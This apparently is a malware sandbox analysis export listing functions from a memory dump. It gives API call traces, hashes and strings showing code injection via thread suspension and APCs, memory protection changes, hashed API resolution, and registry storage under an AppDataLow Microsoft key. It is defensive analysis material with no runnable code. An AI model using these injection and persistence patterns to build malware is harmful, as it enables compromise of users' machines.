Part of subcall function 049F934C: VirtualQuery.KERNEL32(00000000,?,0000001C,?,00000000,?,00000000,?,?,049F1980,00000000,00000000), ref: 049F9390
Part of subcall function 049F934C: VirtualProtect.KERNEL32(00000000,00000000,-392CC87E,049F1980,?,00000000,?,00000000,?,?,049F1980,00000000,00000000), ref: 049F93B5

GetLastError.KERNEL32(00000000,00000004,?,00000000,?,00000000,?,04A13608,0000001C,04A0750B,00000002,00000000,00000001,?,?,?), ref: 049FDB49

Part of subcall function 04A00F44: lstrlen.KERNEL32(?,?,?,?,049F1980), ref: 04A00F7C
Part of subcall function 04A00F44: lstrcpy.KERNEL32(00000000,?), ref: 04A00F93
Part of subcall function 04A00F44: StrChrA.SHLWAPI(00000000,0000002E,?,?,049F1980), ref: 04A00F9C
Part of subcall function 04A00F44: GetModuleHandleA.KERNEL32(00000000,?,?,049F1980), ref: 04A00FBA

VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,00000000,00000000,?,00000000,049F1980,00000000,00000004,?,00000000,?), ref: 049FDAC6
VirtualProtect.KERNELBASE(?,00000004,?,?,00000000,049F1980,00000000,00000004,?,00000000,?,00000000,?,04A13608,0000001C,04A0750B), ref: 049FDAE1
RtlEnterCriticalSection.NTDLL(04A17380), ref: 049FDB06
RtlLeaveCriticalSection.NTDLL(04A17380), ref: 049FDB24

Part of subcall function 049F934C: SetLastError.KERNEL32(?,?,00000000,?,00000000,?,?,049F1980,00000000,00000000), ref: 049F93BE

Strings

, xrefs: 049FDAB5

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
String ID:
API String ID: 899430048-3916222277
Opcode ID: 1f7f921d4963b03c8e0d481724078185d896f67ea88c0253fcf3f6aab6efd81e
Instruction ID: 441aefa6711d87811e30a1aee6de422c5eb23fbbf8c6159af30ac987704f9963
Opcode Fuzzy Hash: 1f7f921d4963b03c8e0d481724078185d896f67ea88c0253fcf3f6aab6efd81e
Instruction Fuzzy Hash: D1418FB5900615EFEB10DF69D844ADEBBB8FF48310F148229EA15A72A0D774E951CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A03A91, Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 04A0EDF2: GetProcAddress.KERNEL32(6F57775A,00000318), ref: 04A0EE17
Part of subcall function 04A0EDF2: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 04A0EE33

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 04A03ACA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04A03BB5

Part of subcall function 04A0EDF2: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 04A0EF9D

VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 04A03B00
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04A03B0C
lstrcmpi.KERNEL32(?,00000000), ref: 04A03B49
StrChrA.SHLWAPI(?,0000002E), ref: 04A03B52
lstrcmpi.KERNEL32(?,00000000), ref: 04A03B64

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
String ID:
API String ID: 3901270786-0
Opcode ID: c2db7b199d5681c84056a30312a5ac688a0c668a01995220f04cc005933c0399
Instruction ID: cae3d15fba29132569839b5c93f9c97e223199f8722d0f615ef9cc932c734df7
Opcode Fuzzy Hash: c2db7b199d5681c84056a30312a5ac688a0c668a01995220f04cc005933c0399
Instruction Fuzzy Hash: C331AF71605715ABDB21CF16EC40F2BBBE8FF99B48F004919FD84A6280D734E904CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 049F96A7, Relevance: 10.6, APIs: 7, Instructions: 80sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 049F957A: memset.NTDLL ref: 049F9584

OpenEventA.KERNEL32(00000002,00000000,00000000,00000000,?,04A0A7CA,?,00000000), ref: 049F9737
SetEvent.KERNEL32(00000000,?,04A0A7CA,?,00000000), ref: 049F9744
Sleep.KERNEL32(00000BB8,?,04A0A7CA,?,00000000), ref: 049F974F
ResetEvent.KERNEL32(00000000,?,04A0A7CA,?,00000000), ref: 049F9756
CloseHandle.KERNEL32(00000000,?,04A0A7CA,?,00000000), ref: 049F975D
GetShellWindow.USER32 ref: 049F9768
GetWindowThreadProcessId.USER32(00000000), ref: 049F976F

Part of subcall function 04A0780B: RegCloseKey.ADVAPI32(?), ref: 04A0788E

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
String ID:
API String ID: 53838381-0
Opcode ID: 180bf318135d93fe7a6a3424e20c99eddfcefd37f5ad9cfdae84a3c0220343cd
Instruction ID: f0ed4cc4909f6d1ae19d01a3257491fdbf200948b222d3e52359a6b57684447e
Opcode Fuzzy Hash: 180bf318135d93fe7a6a3424e20c99eddfcefd37f5ad9cfdae84a3c0220343cd
Instruction Fuzzy Hash: 1A2129B6100710ABEB10AF75FC48E2B7B6EEBE53147008418FA1687150CB38BC03CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A01968, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68registryCOMMON

Download Yara Rule

APIs

Part of subcall function 049F67FB: lstrlen.KERNEL32(?,00000000,00000001,00000027,04A17160,?,00000000,04A096DD,Local\,00000001,?,00000000,?,049F117D), ref: 049F6831
Part of subcall function 049F67FB: lstrcpy.KERNEL32(00000000,00000000), ref: 049F6855
Part of subcall function 049F67FB: lstrcat.KERNEL32(00000000,00000000), ref: 049F685D

RegOpenKeyExA.KERNELBASE(049F959C,00000000,00000000,00020119,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,049F959C,?,80000001), ref: 04A019A1
RegOpenKeyExA.ADVAPI32(049F959C,00000000,00000000,00020019,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,049F959C,?,80000001), ref: 04A019B5
RegCloseKey.KERNELBASE(80000001,80000001,Client32,?,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,049F959C,?,80000001), ref: 04A019FE

Strings

Client32, xrefs: 04A019C3
Software\AppDataLow\Software\Microsoft\, xrefs: 04A01976
Client64, xrefs: 04A019E7

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Open$Closelstrcatlstrcpylstrlen
String ID: Client32$Client64$Software\AppDataLow\Software\Microsoft\
API String ID: 4131162436-710576342
Opcode ID: a70ac40c76ed8589969d7628f936b924aafb7faf57f0bf22043076464ef090d2
Instruction ID: 232ae0f8535b3c9d4b273ebee3769fba45f294a536f366c5dbf9aaf9e5f3c378
Opcode Fuzzy Hash: a70ac40c76ed8589969d7628f936b924aafb7faf57f0bf22043076464ef090d2
Instruction Fuzzy Hash: 44116D7690025DBF9B11EFA5EDC0CEFBBBCEB45358B108179F905A2050D375AE069B60

Uniqueness

Uniqueness Score: -1.00%

Function 04A00271, Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 04A00294

Part of subcall function 04A0E730: GetModuleHandleA.KERNEL32(4E52454B,04A170E8,?,?,?,04A002B4,00000000,04A170E8,?,00000000), ref: 04A0E751
Part of subcall function 04A0E730: GetProcAddress.KERNEL32(00000000,6F577349), ref: 04A0E76A
Part of subcall function 04A0E730: OpenProcess.KERNEL32(00000400,00000000,04A002B4,04A170E8,?,?,?,04A002B4,00000000,04A170E8,?,00000000), ref: 04A0E787
Part of subcall function 04A0E730: IsWow64Process.KERNEL32(00000000,00000000,04A170E8,?,?,?,04A002B4,00000000,04A170E8,?,00000000), ref: 04A0E798
Part of subcall function 04A0E730: FindCloseChangeNotification.KERNELBASE(00000000,?,?,04A002B4,00000000,04A170E8,?,00000000), ref: 04A0E7AB

ResumeThread.KERNEL32(?,00000000,04A170E8,?,00000000), ref: 04A0034E
WaitForSingleObject.KERNEL32(00000064), ref: 04A0035C
SuspendThread.KERNEL32(?), ref: 04A0036F

Part of subcall function 04A0C4B1: memset.NTDLL ref: 04A0C77C

ResumeThread.KERNELBASE(?), ref: 04A003F2

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
String ID:
API String ID: 2397206891-0
Opcode ID: 57082ba9ec687f8e952641caefe6fb28f0a68e771cc2ec4652b95acbf17d68db
Instruction ID: c07f0a5c0f37abb9a083e72f20e0daa0408ddb19e79ac03e89d0a55298b62c09
Opcode Fuzzy Hash: 57082ba9ec687f8e952641caefe6fb28f0a68e771cc2ec4652b95acbf17d68db
Instruction Fuzzy Hash: 7C41AE71904248EFEF129FA4ED84BEE7BB9FB04304F048466FA05A6190DB35EA51CB51

Uniqueness

Uniqueness Score: -1.00%

Function 049FA613, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,?,?,00000000,04A13618,00000018,04A0E156,00000000,?,?,?,?,00000000), ref: 049FA656
VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,00000000,00000004,00000000,?,00000000,?,?,?,00000000,04A13618,00000018,04A0E156), ref: 049FA6E1
RtlEnterCriticalSection.NTDLL(04A17380), ref: 049FA70A
RtlLeaveCriticalSection.NTDLL(04A17380), ref: 049FA728

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
String ID:
API String ID: 3666628472-0
Opcode ID: 5c33a8e0f22450f06f3dc2dcade8efb8daf79548ea784b6b8193b4b855e7a90c
Instruction ID: cf562ec0000ac563723d45cebdd2982b1287285213bc8bcfd56c1f707e52b807
Opcode Fuzzy Hash: 5c33a8e0f22450f06f3dc2dcade8efb8daf79548ea784b6b8193b4b855e7a90c
Instruction Fuzzy Hash: C8410675A00705AFEB11DF65C884A9EBBF9FF48300B10852AEA59D7260D774BA41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 049FD66E, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

GetModuleHandleA.KERNEL32(4C44544E,00000020,00000000,00008664,?,00000000,00000000,?,04A0C5CC,?,00000000,00000000,?,00000000), ref: 049FD693
GetProcAddress.KERNEL32(00000000,7243775A), ref: 049FD6B5
GetProcAddress.KERNEL32(00000000,614D775A), ref: 049FD6CB
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 049FD6E1
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 049FD6F7
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 049FD70D

Part of subcall function 04A0AE64: NtCreateSection.NTDLL(00000000,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000), ref: 04A0AEC1
Part of subcall function 04A0AE64: memset.NTDLL ref: 04A0AEE5

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 3012371009-0
Opcode ID: a28239f1c1ca6804373fee58473762629959d3514b55619b366a7d290b01489f
Instruction ID: bbe9f3484c93d8f198f529bdb5ae816b8eadefda7b9525299b3180851b4f1788
Opcode Fuzzy Hash: a28239f1c1ca6804373fee58473762629959d3514b55619b366a7d290b01489f
Instruction Fuzzy Hash: 04218DB4501A0AEFEB11DF69DC84D5AB7ECEF583047118526E986CB220E774FE068B60

Uniqueness

Uniqueness Score: -1.00%

Function 04A08CE0, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,049F2288), ref: 04A08CF7
QueueUserAPC.KERNELBASE(?,00000000,?,?,049FB525,049F5FCD,00000000,?,?,?,?,049F1141,?,?), ref: 04A08D0C
GetLastError.KERNEL32(00000000,?,049FB525,049F5FCD,00000000,?,?,?,?,049F1141,?,?), ref: 04A08D17
TerminateThread.KERNEL32(00000000,00000000,?,049FB525,049F5FCD,00000000,?,?,?,?,049F1141,?,?), ref: 04A08D21
CloseHandle.KERNEL32(00000000,?,049FB525,049F5FCD,00000000,?,?,?,?,049F1141,?,?), ref: 04A08D28
SetLastError.KERNEL32(00000000,?,049FB525,049F5FCD,00000000,?,?,?,?,049F1141,?,?), ref: 04A08D31

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: a883d0675358c9acd553dce80c7276046a5ea8532db99ef98a45bd4f57a847e8
Instruction ID: 0c30873e38276a3ae1151658f59114e96f75efa9887c687a7fcd02eac80d7a01
Opcode Fuzzy Hash: a883d0675358c9acd553dce80c7276046a5ea8532db99ef98a45bd4f57a847e8
Instruction Fuzzy Hash: 61F08236242220BBEF222F60AC08F4BBFA9EF38752F004514FE0590070C7398C029B95

Uniqueness

Uniqueness Score: -1.00%

Function 04A0A853, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

memcpy.NTDLL(04A1726C,049FBB3A,00000018,00000000,00000000,74B04D40,049FBB3A,?,?,?,00000000), ref: 04A0A869
GetModuleHandleA.KERNEL32(NTDLL.DLL,00000000,00000000,74B04D40,049FBB3A,?,?,?,00000000), ref: 04A0A88E
GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00000000), ref: 04A0A89E

Strings

KERNEL32.DLL, xrefs: 04A0A899
NTDLL.DLL, xrefs: 04A0A877

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: HandleModule$memcpy
String ID: KERNEL32.DLL$NTDLL.DLL
API String ID: 1864057842-633099880
Opcode ID: 081701c778f2141b36d3b45956f36e48602bcf6470168d3be4d7056b30ee4db4
Instruction ID: 0501bb0e6fe02bdc00ad5d76ff99da1a8aaffeaaa6e3ea7763effbf0e5e4eee8
Opcode Fuzzy Hash: 081701c778f2141b36d3b45956f36e48602bcf6470168d3be4d7056b30ee4db4
Instruction Fuzzy Hash: B801D232A44301EBF721AF65AC80A5577E8FBB8710F10553BE945921A0E774B84E9B51

Uniqueness

Uniqueness Score: -1.00%

Function 04A0CFA6, Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 049F2D2F: RegCreateKeyA.ADVAPI32(80000001,05A987E8,?), ref: 049F2D44
Part of subcall function 049F2D2F: lstrlen.KERNEL32(05A987E8,00000000,00000000,00000028,?,?,?,?,04A0F9C6,00000001,?), ref: 049F2D72

RegQueryValueExA.KERNELBASE(?,04A0E66E,00000000,04A0E66E,00000000,04A088E0,00000003,00000000,?,00000000,?,04A0E66E,04A0E66E,?,04A088E0,00000000), ref: 04A0CFDE
RtlAllocateHeap.NTDLL(00000000,04A088E0), ref: 04A0CFF2
RegQueryValueExA.ADVAPI32(?,04A0E66E,00000000,04A0E66E,00000000,04A088E0,?,04A088E0,00000000,04A0E66E,?,?,?,04A0E66E,?), ref: 04A0D00C
HeapFree.KERNEL32(00000000,04A088E0,?,04A088E0,00000000,04A0E66E,?,?,?,04A0E66E,?,?,?,00000000,?,?), ref: 04A0D028
RegCloseKey.KERNELBASE(?,?,04A088E0,00000000,04A0E66E,?,?,?,04A0E66E,?,?,?,00000000,?,?,?), ref: 04A0D036

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
String ID:
API String ID: 1633053242-0
Opcode ID: 31d9d8fc5ac830416a5750bbfef9689004730c69764245cedcb456f1ce00b2da
Instruction ID: 34423184962ee152e824b984f4557eb25eff15da3bce77c6aad36b781b5c1837
Opcode Fuzzy Hash: 31d9d8fc5ac830416a5750bbfef9689004730c69764245cedcb456f1ce00b2da
Instruction Fuzzy Hash: A3119DB2100108FFEF019F94EC84CAE7BBEFB98350B004426F90693160E732AE52DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04A0E730, Relevance: 7.5, APIs: 5, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(4E52454B,04A170E8,?,?,?,04A002B4,00000000,04A170E8,?,00000000), ref: 04A0E751
GetProcAddress.KERNEL32(00000000,6F577349), ref: 04A0E76A
OpenProcess.KERNEL32(00000400,00000000,04A002B4,04A170E8,?,?,?,04A002B4,00000000,04A170E8,?,00000000), ref: 04A0E787
IsWow64Process.KERNEL32(00000000,00000000,04A170E8,?,?,?,04A002B4,00000000,04A170E8,?,00000000), ref: 04A0E798
FindCloseChangeNotification.KERNELBASE(00000000,?,?,04A002B4,00000000,04A170E8,?,00000000), ref: 04A0E7AB

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
String ID:
API String ID: 1712524627-0
Opcode ID: 29aaed158e4cb0127549307f597a3c010ea1fac2fc701ffcd3d1e1e2fc13484a
Instruction ID: 1bc14db3937fc927c31337d0e2203bcb6d1e46e6fea2023fe081b966ab00c07b
Opcode Fuzzy Hash: 29aaed158e4cb0127549307f597a3c010ea1fac2fc701ffcd3d1e1e2fc13484a
Instruction Fuzzy Hash: D90152B5501204EFEB11DF55E888C9B7BFCEBA93517248529FD05D3260E738AE42DB50

Uniqueness

Uniqueness Score: -1.00%

Function 049F934C, Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(00000000,00000000,00000040,049F1980,?,?,00000000,?,00000000,?,?,049F1980,00000000,00000000), ref: 049F9371
GetLastError.KERNEL32(?,00000000,?,00000000,?,?,049F1980,00000000,00000000), ref: 049F9379
VirtualQuery.KERNEL32(00000000,?,0000001C,?,00000000,?,00000000,?,?,049F1980,00000000,00000000), ref: 049F9390
VirtualProtect.KERNEL32(00000000,00000000,-392CC87E,049F1980,?,00000000,?,00000000,?,?,049F1980,00000000,00000000), ref: 049F93B5
SetLastError.KERNEL32(?,?,00000000,?,00000000,?,?,049F1980,00000000,00000000), ref: 049F93BE

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Virtual$ErrorLastProtect$Query
String ID:
API String ID: 148356745-0
Opcode ID: d4ea26dfa3c9b93e6261a499042fb0249c89edba23493409a30ae92bca9dba0d
Instruction ID: 48ae62f9fcdb6eb25029193033536aac7ca412d7f5cc2f6be2f0b366cf4468d6
Opcode Fuzzy Hash: d4ea26dfa3c9b93e6261a499042fb0249c89edba23493409a30ae92bca9dba0d
Instruction Fuzzy Hash: 3201257650110AFFAF019FA5CC8489ABBFDFB582147008026FA42921A0DBB5E9559BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A0F99E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

Part of subcall function 049F2D2F: RegCreateKeyA.ADVAPI32(80000001,05A987E8,?), ref: 049F2D44
Part of subcall function 049F2D2F: lstrlen.KERNEL32(05A987E8,00000000,00000000,00000028,?,?,?,?,04A0F9C6,00000001,?), ref: 049F2D72

RegQueryValueExA.KERNELBASE(?,Client,00000000,?,04A16068,?,00000001,?,?,04A1606E,?,?,?), ref: 04A0F9E9
RegSetValueExA.KERNELBASE(?,Client,00000000,00000003,04A16068,00000028,?,04A1606E,?,?,?), ref: 04A0FA2A
RegCloseKey.ADVAPI32(?,?,04A1606E,?,?,?), ref: 04A0FA36

Strings

Client, xrefs: 04A0F9CE, 04A0F9E2, 04A0FA1A, 04A0FA55

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Value$CloseCreateQuerylstrlen
String ID: Client
API String ID: 2552977122-3236430179
Opcode ID: 93a4ba1a9327bca844fbcb1f2eb8823978cf4d70db78ea3be30c6b702f383cd4
Instruction ID: b8768b550377ea01d763d8076a57b192ccb22a3b5739fe18a9384bdd665230a7
Opcode Fuzzy Hash: 93a4ba1a9327bca844fbcb1f2eb8823978cf4d70db78ea3be30c6b702f383cd4
Instruction Fuzzy Hash: EC211DB5D40208EFFB21DF95E944B9E7BB8EB14754F508066F900E7190D7B8AE46CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04A0C89D, Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 04A0C8CB
ResumeThread.KERNELBASE(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 04A0C955
WaitForSingleObject.KERNEL32(00000064), ref: 04A0C963
SuspendThread.KERNELBASE(?), ref: 04A0C976

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Thread$ObjectResumeSingleSuspendWaitmemset
String ID:
API String ID: 3168247402-0
Opcode ID: e1f12a1fd1ab94ca76601b21ad152982fe3ef54e81579810e76c0b02594f85b2
Instruction ID: a05154de4edffb3cb839b65d5e3e06d7096d92508035baa6897c8d54b55a9b57
Opcode Fuzzy Hash: e1f12a1fd1ab94ca76601b21ad152982fe3ef54e81579810e76c0b02594f85b2
Instruction Fuzzy Hash: E0415171108301AFEB11DF50DD81E6BBBE9FF88364F048A2DFA94921A0D731E955CB62

Uniqueness

Uniqueness Score: -1.00%

Function 049F254F, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?), ref: 049F25A1
memcpy.NTDLL(?,?,?,?,?,?), ref: 049F2632
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 049F264D

Strings

Jan 12 2021, xrefs: 049F25C2

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Jan 12 2021
API String ID: 4010158826-1209139484
Opcode ID: 4d6ea95e290d0b7b7be72945c923b5fa4cfc3be74f3add6b1aebe6f022110b8b
Instruction ID: 29811f62d794bddb28d7d8efcc4a2a5e61f0b8a0058bde3b9df54f9ddbdf3627
Opcode Fuzzy Hash: 4d6ea95e290d0b7b7be72945c923b5fa4cfc3be74f3add6b1aebe6f022110b8b
Instruction Fuzzy Hash: DB316575E00209ABDF01DF98CC81BEEB7B9EF08314F144165EA05FB290D776AA068B90

Uniqueness

Uniqueness Score: -1.00%

Function 04A027B0, Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,00000000,?,?,?,?,04A019D0,80000001,Client32,?,80000001), ref: 04A027D5
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04A027EC
HeapFree.KERNEL32(00000000,00000000,?,?,?,04A019D0,80000001,Client32,?,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,049F959C), ref: 04A02807
RegQueryValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,?,?,?,04A019D0,80000001,Client32,?,80000001,?,Software\AppDataLow\Software\Microsoft\), ref: 04A02826

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateFree
String ID:
API String ID: 4267586637-0
Opcode ID: 0e0aa57819c642383dffe36346b55f91ebc0103da05c6d57cc3485892ad38391
Instruction ID: 96477e7ab451eac587b0c58adcf93b4ecf8b98f7c401953532a78951a36dd2c4
Opcode Fuzzy Hash: 0e0aa57819c642383dffe36346b55f91ebc0103da05c6d57cc3485892ad38391
Instruction Fuzzy Hash: 361142B6500218FFDF12CF94EC88DEEBBBDEB89750F104065F90192150D2716E41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04A082D9, Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON

Download Yara Rule

APIs

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,?,00000000,049F6939,?,049FCD8A,?), ref: 04A082F8
PathFindFileNameW.SHLWAPI(00000000,04A170E8,?,00000000,00000800,00001000,?,00000000,049F6939,?,049FCD8A,?), ref: 04A08303
_wcsupr.NTDLL ref: 04A08310
lstrlenW.KERNEL32(00000000), ref: 04A08318

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
String ID:
API String ID: 2533608484-0
Opcode ID: 36d0dfed09872f159a8fa08aa10fb8a79a84588411e723db920d0ee3caee25ec
Instruction ID: 6f4eb973ec8e6ad2dac711c0f1794a8efbe789857e42871b78a1569c53df3438
Opcode Fuzzy Hash: 36d0dfed09872f159a8fa08aa10fb8a79a84588411e723db920d0ee3caee25ec
Instruction Fuzzy Hash: C4F0E9321022111BB3223F747C88AAF2669FFE4798710A039F900C1190CF58EC079255

Uniqueness

Uniqueness Score: -1.00%

Function 04A10AF9, Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04A10B18

Part of subcall function 049F44A6: RtlEnterCriticalSection.NTDLL(00000000), ref: 049F44B2
Part of subcall function 049F44A6: CloseHandle.KERNEL32(?), ref: 049F44C0
Part of subcall function 049F44A6: RtlLeaveCriticalSection.NTDLL(00000000), ref: 049F44DC

CloseHandle.KERNEL32(?), ref: 04A10B26
InterlockedDecrement.KERNEL32(04A16FDC), ref: 04A10B35

Part of subcall function 049F19F6: SetEvent.KERNEL32(000003CC,04A10B50), ref: 049F1A00
Part of subcall function 049F19F6: CloseHandle.KERNEL32(000003CC), ref: 049F1A15
Part of subcall function 049F19F6: HeapDestroy.KERNELBASE(056A0000), ref: 049F1A25

RtlExitUserThread.NTDLL(00000000), ref: 04A10B51

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
String ID:
API String ID: 1141245775-0
Opcode ID: adf952ed17977588bab1d4bf73c81ceae4c723f447d149e3f8927e86d17c24c0
Instruction ID: dba253bae0e963093d6a87acaafee4cd91773294d0a36257cc401ad8185073b5
Opcode Fuzzy Hash: adf952ed17977588bab1d4bf73c81ceae4c723f447d149e3f8927e86d17c24c0
Instruction Fuzzy Hash: F9F04F34655300BBFB115F689C09E6A7BBCEB51774F110258FA25E72E0DB78AD428BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A0E4B0, Relevance: 5.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 04A0E4D6
memcpy.NTDLL ref: 04A0E4FE

Part of subcall function 049F75AA: NtAllocateVirtualMemory.NTDLL(04A0BEC6,00000000,00000000,04A0BEC6,00003000,00000040), ref: 049F75DB
Part of subcall function 049F75AA: RtlNtStatusToDosError.NTDLL(00000000), ref: 049F75E2
Part of subcall function 049F75AA: SetLastError.KERNEL32(00000000), ref: 049F75E9

GetLastError.KERNEL32(00000010,00000218,04A11C7D,00000100,?,00000318,00000008), ref: 04A0E515
GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,04A11C7D,00000100), ref: 04A0E5F8

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
String ID:
API String ID: 685050087-0
Opcode ID: 213ce11225dbd442ae32d5520bb471caf86c67368a659eafa3cf126a1e412d9d
Instruction ID: 3dd2649b4b2c2468b9611b522240e1c14390da82c12ccf267a8655589f39eab5
Opcode Fuzzy Hash: 213ce11225dbd442ae32d5520bb471caf86c67368a659eafa3cf126a1e412d9d
